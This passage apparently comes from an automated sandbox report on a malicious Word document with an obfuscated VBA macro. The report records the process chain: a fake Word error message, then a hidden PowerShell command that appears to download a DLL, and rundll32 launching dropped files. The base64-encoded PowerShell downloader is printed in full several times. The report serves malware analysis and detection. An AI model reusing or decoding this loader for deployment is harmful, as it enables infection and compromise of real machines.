JwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095755658.0000000002080000.00000002.00000001.sdmp
                      Source: Info.docInitial sample: OLE summary subject = Granite Kids & Beauty Director portals interface well-modulated white Web robust Wyoming Lodge database action-items

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: Info.docStream path 'Macros/VBA/E2ajbo3kwzka_d5z' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module E2ajbo3kwzka_d5z
                      PowerShell case anomaly foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQ